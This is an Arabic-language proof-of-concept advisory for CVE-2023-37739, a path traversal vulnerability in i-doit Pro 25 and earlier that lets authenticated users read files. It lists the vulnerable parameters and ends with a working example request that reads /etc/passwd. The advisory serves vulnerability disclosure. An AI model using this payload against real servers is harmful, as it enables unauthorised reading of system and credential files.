
إثبات مفهوم لاستغلال CVE-2023-37739، وهي ثغرة اجتياز المسار في i-doit Pro 25 وما دونها، مما تتيح للمستخدمين المصادق عليهم قراءة الملفات الحساسة عبر معاملات moduleID و file مصممة بعناية.
i-doit Pro 25 والإصدارات الأقدم معرضة لثغرة اجتياز المسار (Path Traversal). تسمح هذه الثغرات للمهاجمين المصادق عليهم عن بُعد (بصلاحيات منخفضة أو عالية) بالتنقل إلى مواقع لا ينبغي أن تكون متاحة للمستخدم. يمكن استخدامها لقراءة و/أو الوصول إلى ملفات حساسة.
وصف المنتج: i-doit هو توثيق تقني قائم على الويب وقاعدة بيانات إدارة التكوين (CMDB) تم تطويره بواسطة synetics GmbH، i-doit Pro هو الإصدار التجاري من البرنامج ويتطلب ترخيصًا مدفوعًا. يأتي بميزات إضافية ودعم احترافي وتحديثات وتحسينات منتظمة. يحتاج المستخدمون إلى شراء ترخيص لاستخدام i-doit Pro، وتختلف التكلفة بناءً على عدد المستخدمين والميزات المطلوبة.
وصف الثغرة: وجدنا أن هذا التطبيق الويب يسمح لأي مستخدم مصادق عليه بالتنقل إلى مواقع لا ينبغي أن تكون متاحة للمستخدم. يمكن استخدامها لقراءة و/أو الوصول إلى ملفات حساسة...
الصفحات المتأثرة: /?moduleID و /index.php
المعامل والمكوّن المتأثر 1: ?moduleID=2&file_manager=image&file
المعامل والمكوّن المتأثر 2: ?viewMode=1100&objID=56&tvMode=1006&catgID=27&objTypeID=39&editMode=0&objGroupID=2&moduleID=2&file_manager=image&file=
الخطوة 1: سجّل الدخول كأي مستخدم صالح، يمكن أن يكون بصلاحية منخفضة أو عالية. انتقل إلى الرابط أدناه، وعدّل ../../../ إلى الملف الذي ترغب في قراءته أو الوصول إليه.

مثال 1: http://IP/?moduleID=2&file_manager=image&file=../../../../../../..//etc/passwd


